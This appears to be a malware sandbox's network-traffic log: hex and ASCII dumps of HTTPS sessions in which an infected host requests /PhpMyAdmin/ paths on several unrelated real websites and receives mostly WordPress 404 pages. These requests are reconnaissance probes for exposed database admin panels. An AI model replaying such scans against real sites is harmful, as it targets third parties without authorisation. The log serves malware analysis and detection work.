2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c 0a 20 20 20 20 27 4d 61 79 27 2c 0a 20 20 Data Ascii: .datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April', 'May',
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 27 2c 0a 20 Data Ascii: nd'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\u0020field',
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 76 61 6c 69 64 61 74 Data Ascii: ('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), validat
2024-02-20 23:26:17 UTC	1369	IN	Data Raw: 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 64 6f 63 6c 69 6e 6b 73 Data Ascii: in.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js', 1) .add('doclinks

Session ID	Source IP	Source Port	Destination IP	Destination Port
203	192.168.2.6	65296	85.214.145.11	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	173	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	448	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/" Server-Timing: wp-before-template;dur=299.37, wp-before-template-db-queries;dur=9.59
2024-02-20 23:26:17 UTC	15936	IN	Data Raw: 31 64 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 Data Ascii: 1dc8<!DOCTYPE html><html lang="de-DE" class="no-js"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><meta name='robots' content='noindex, follow' />... This
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 4b 5a 22 3a 22 4b 61 73 61 63 68 73 74 61 6e 22 2c 22 51 41 22 3a 22 4b 61 74 61 72 22 2c 22 4b 45 22 3a 22 4b 65 6e 69 61 22 2c 22 4b 47 22 3a 22 4b 69 72 67 69 73 69 73 74 61 6e 22 2c 22 4b 49 22 3a 22 4b 69 72 69 62 61 74 69 22 2c 22 55 4d 22 3a 22 4b 6c 65 69 6e 65 72 65 20 49 6e 73 65 6c 62 65 73 69 74 7a 75 6e 67 65 6e 20 64 65 72 20 56 65 72 65 69 6e 69 67 74 65 6e 20 53 74 61 61 74 65 6e 22 2c 22 43 43 22 3a 22 4b 6f 6b 6f 73 69 6e 73 65 6c 6e 22 2c 22 43 4f 22 3a 22 4b 6f 6c 75 6d 62 69 65 6e 22 2c 22 4b 4d 22 3a 22 4b 6f 6d 6f 72 65 6e 22 2c 22 43 47 22 3a 22 4b 6f 6e 67 6f 22 2c 22 43 44 22 3a 22 4b 6f 6e 67 6f 2c 20 44 65 6d 6f 6b 72 61 74 69 73 63 68 65 20 52 65 70 75 62 6c 69 6b 22 2c 22 4b 52 22 3a 22 4b 6f 72 65 61 22 2c 22 48 52 22 3a 22 Data Ascii: KZ":"Kasachstan","QA":"Katar","KE":"Kenia","KG":"Kirgisistan","KI":"Kiribati","UM":"Kleinere Inselbesitzungen der Vereinigten Staaten","CC":"Kokosinseln","CO":"Kolumbien","KM":"Komoren","CG":"Kongo","CD":"Kongo, Demokratische Republik","KR":"Korea","HR":"
2024-02-20 23:26:17 UTC	15044	IN	Data Raw: 72 61 6e 73 66 6f 72 6d 3a 75 70 70 65 72 63 61 73 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 7b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 2e 32 35 65 6d 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 37 35 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 68 61 73 2d 74 65 78 74 2d 61 6c 69 67 6e 2d 72 69 67 68 74 7b 62 6f 72 64 65 72 2d Data Ascii: ransform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-quote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-

Session ID	Source IP	Source Port	Destination IP	Destination Port
204	192.168.2.6	65286	162.0.235.125	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	182	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:16 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:16 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:16 UTC	15975	IN	Data Raw: 37 45 35 43 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 7E5C<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:16 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:16 UTC	8177	IN	Data Raw: 33 0d 0a 32 43 37 30 30 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e Data Ascii: 32C700i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.

Session ID	Source IP	Source Port	Destination IP	Destination Port
205	192.168.2.6	65226	178.33.253.225	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	168	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: cfca.eu Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 20 Feb 2024 23:26:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.2.15 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://cfca.eu/wp-json/>; rel="https://api.w.org/"
2024-02-20 23:26:17 UTC	16040	IN	Data Raw: 31 65 63 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 6e 20 74 72 6f 75 76 c3 a9 65 20 26 23 38 32 31 31 3b 20 43 46 43 41 20 26 23 38 32 31 31 3b 20 43 61 62 69 6e 65 74 20 64 26 23 30 Data Ascii: 1ec3<!doctype html><html lang="fr-FR"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page non trouve – CFCA – Cabinet d&#0
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 6c 69 62 2f 65 69 63 6f 6e 73 2f 63 73 73 2f 65 6c 65 0d 0a 32 30 30 30 0d 0a 6d 65 6e 74 6f 72 2d 69 63 6f 6e 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 35 2e 32 37 2e 30 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 66 63 61 2e 65 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 61 73 73 65 74 73 2f 63 73 73 2f 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 33 2e 31 39 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c Data Ascii: ugins/elementor/assets/lib/eicons/css/ele2000mentor-icons.min.css?ver=5.27.0' media='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://cfca.eu/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.19.2' media='all' /><
2024-02-20 23:26:17 UTC	16384	IN	Data Raw: 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 0a 20 20 66 6f 0d 0a 31 30 30 30 0d 0a 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 73 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 67 34 51 49 46 71 50 66 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 34 36 30 2d 30 35 32 46 2c 20 55 2b 31 43 38 30 2d 31 43 38 38 2c 20 55 2b 32 30 42 34 Data Ascii: ce { font-family: 'Raleway'; font-style: italic; fo1000nt-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptsg8zYS_SKggPNyCg4QIFqPfE.woff2) format('woff2'); unicode-range: U+0460-052F, U+1C80-1C88, U+20B4
2024-02-20 23:26:17 UTC	14797	IN	Data Raw: 0a 7d 0a 2f 2a 20 63 79 72 69 6c 6c 69 63 20 2a 2f 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 52 61 6c 65 77 61 79 27 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 36 30 30 3b 0a 20 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 0a 20 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 73 2f 72 61 6c 65 77 61 79 2f 76 32 39 2f 31 50 74 75 67 38 7a 59 53 5f 53 4b 67 67 50 4e 79 43 6b 49 54 35 6c 75 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 27 77 6f 66 66 32 27 29 3b 0a 20 20 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 30 33 30 31 2c 20 55 2b 30 34 30 30 2d 30 34 Data Ascii: }/* cyrillic */@font-face { font-family: 'Raleway'; font-style: normal; font-weight: 600; font-display: swap; src: url(https://fonts.gstatic.com/s/raleway/v29/1Ptug8zYS_SKggPNyCkIT5lu.woff2) format('woff2'); unicode-range: U+0301, U+0400-04

Session ID	Source IP	Source Port	Destination IP	Destination Port
206	192.168.2.6	65343	81.169.145.86	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:16 UTC	177	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: ksv-schwimmen.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:17 UTC	520	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:16 GMT Server: Apache/2.4.58 (Unix) X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://ksv-schwimmen.de/wp-json/>; rel="https://api.w.org/" X-TEC-API-VERSION: v1 X-TEC-API-ROOT: https://ksv-schwimmen.de/wp-json/tribe/events/v1/ X-TEC-API-ORIGIN: https://ksv-schwimmen.de Vary: User-Agent Content-Type: text/html; charset=UTF-8 Connection: close Transfer-Encoding: chunked
2024-02-20 23:26:17 UTC	7672	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 2d 44 45 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0d 0a 09 20 3c 74 69 74 6c 65 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 20 26 23 38 32 31 31 3b 20 4b 53 56 20 4e 65 70 74 75 6e 20 31 38 38 39 Data Ascii: 2000<!DOCTYPE html><html lang="de-DE"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>Seite nicht gefunden – KSV Neptun 1889
